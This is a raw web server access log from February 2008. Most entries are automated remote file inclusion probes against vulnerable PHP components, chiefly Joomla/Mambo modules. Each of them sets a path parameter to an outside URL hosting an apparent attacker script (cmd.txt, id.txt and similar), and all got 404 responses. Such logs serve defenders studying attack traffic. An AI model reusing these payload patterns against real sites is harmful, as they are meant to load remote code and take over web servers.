87.230.11.181 - - [17/Feb/2008:11:46:04 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.115.163.50 - - [17/Feb/2008:11:46:05 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.115.163.50 - - [17/Feb/2008:11:46:06 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.115.163.50 - - [17/Feb/2008:11:46:06 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.115.163.50 - - [17/Feb/2008:11:46:08 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:11:46:29 -0800] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:11:46:29 -0800] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
85.214.87.108 - - [17/Feb/2008:11:46:35 -0800] "GET /logs/access_080131.log/modules/Neos_Chronos/header.php?base_folder=http://hellinsoloradio.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.149.90.29 - - [17/Feb/2008:11:47:25 -0800] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
83.149.90.29 - - [17/Feb/2008:11:47:25 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
74.6.22.158 - - [17/Feb/2008:11:48:02 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.158 - - [17/Feb/2008:11:48:02 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.56.202 - - [17/Feb/2008:11:48:04 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [17/Feb/2008:11:49:04 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [17/Feb/2008:11:49:04 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [17/Feb/2008:11:49:04 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.180.57 - - [17/Feb/2008:11:49:31 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.180.57 - - [17/Feb/2008:11:49:31 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.180.57 - - [17/Feb/2008:11:49:31 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:49:43 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:49:43 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:49:43 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.180.57 - - [17/Feb/2008:11:49:49 -0800] "GET /logs/access.log/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.180.57 - - [17/Feb/2008:11:49:49 -0800] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.180.57 - - [17/Feb/2008:11:49:49 -0800] "GET /logs/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:49:52 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:49:53 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:49:53 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [17/Feb/2008:11:49:55 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:50:03 -0800] "GET /logs/access.log/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:50:03 -0800] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:50:03 -0800] "GET /logs/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.130.198 - - [17/Feb/2008:11:50:04 -0800] "GET /logs/access.log/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [17/Feb/2008:11:50:05 -0800] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [17/Feb/2008:11:50:05 -0800] "GET /logs/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:50:05 -0800] "GET /logs/access.log/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:50:05 -0800] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:50:05 -0800] "GET /logs/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.164.10 - - [17/Feb/2008:11:50:44 -0800] "GET /logs/access_080126.log//login.php?dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [17/Feb/2008:11:50:44 -0800] "GET //login.php?dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [17/Feb/2008:11:50:44 -0800] "GET /logs//login.php?dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:11:50:54 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:11:50:54 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.25.213.172 - - [17/Feb/2008:11:51:31 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.23 - - [17/Feb/2008:11:51:57 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.110 - - [17/Feb/2008:11:51:58 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sattamax.net/gallery/include/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [17/Feb/2008:11:52:52 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.180.57 - - [17/Feb/2008:11:52:54 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.180.57 - - [17/Feb/2008:11:53:03 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.180.57 - - [17/Feb/2008:11:53:03 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.180.57 - - [17/Feb/2008:11:53:04 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.180.57 - - [17/Feb/2008:11:53:04 -0800] "GET /logs/access_071230.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:53:13 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:53:13 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.130.198 - - [17/Feb/2008:11:53:29 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [17/Feb/2008:11:53:29 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [17/Feb/2008:11:53:29 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [17/Feb/2008:11:53:30 -0800] "GET /logs/access_071230.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [17/Feb/2008:11:54:59 -0800] "GET /logs/access_080121.log//components/com_simpleboard/image_upload.php?sbp=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [17/Feb/2008:11:54:59 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [17/Feb/2008:11:54:59 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [17/Feb/2008:11:56:12 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.13.86.23 - - [17/Feb/2008:11:56:30 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.23 - - [17/Feb/2008:11:56:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.109.165 - - [17/Feb/2008:11:56:39 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.109.165 - - [17/Feb/2008:11:56:39 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.109.165 - - [17/Feb/2008:11:56:40 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
210.245.164.10 - - [17/Feb/2008:11:56:46 -0800] "GET /logs/access_080108.log//login.php?dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.12.50.119 - - [17/Feb/2008:11:57:55 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
85.12.50.119 - - [17/Feb/2008:11:57:55 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
85.12.50.119 - - [17/Feb/2008:11:57:56 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
85.12.50.119 - - [17/Feb/2008:11:57:56 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
85.214.87.108 - - [17/Feb/2008:11:58:00 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.179.160 - - [17/Feb/2008:11:58:05 -0800] "GET /errors.php?error=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
207.58.179.160 - - [17/Feb/2008:11:58:06 -0800] "GET /logs/errors.php?error=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
207.58.180.57 - - [17/Feb/2008:11:58:47 -0800] "GET /logs/access_080104.log/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [17/Feb/2008:11:58:49 -0800] "GET /logs/access_080104.log/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.16.96.219 - - [17/Feb/2008:11:58:50 -0800] "GET /logs/access_080126.log//modules/xfsection/modify.php?dir_module=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [17/Feb/2008:11:58:51 -0800] "GET //modules/xfsection/modify.php?dir_module=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [17/Feb/2008:11:58:51 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.105.61.241 - - [17/Feb/2008:11:59:27 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://crime.fileave/klotok.txt?http://crime.fileave/klotok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:59:30 -0800] "GET /logs/access_080104.log/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:59:42 -0800] "GET /logs/access_080104.log/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:12:00:00 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:12:00:00 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
212.112.227.107 - - [17/Feb/2008:12:00:07 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
212.227.109.165 - - [17/Feb/2008:12:00:17 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.109.165 - - [17/Feb/2008:12:00:17 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.109.165 - - [17/Feb/2008:12:00:17 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.109.165 - - [17/Feb/2008:12:00:18 -0800] "GET /logs/access_080120.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
87.25.213.172 - - [17/Feb/2008:12:00:25 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.25.213.172 - - [17/Feb/2008:12:00:26 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:12:01:24 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.104.248.62 - - [17/Feb/2008:12:01:58 -0800] "GET //login.php?dir=http://www.loveingod.org/bbs/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.70.35.179 - - [17/Feb/2008:12:01:59 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
84.234.71.230 - - [17/Feb/2008:12:02:13 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.95 - - [17/Feb/2008:12:02:27 -0800] "GET /logs/access.log/index.php?sub=http://www.obzxpl.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.104.248.62 - - [17/Feb/2008:12:03:16 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.loveingod.org/bbs/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.225.251.165 - - [17/Feb/2008:12:03:44 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://cosmic.lydo.org/doc/s.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.225.251.165 - - [17/Feb/2008:12:03:44 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://cosmic.lydo.org/doc/s.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
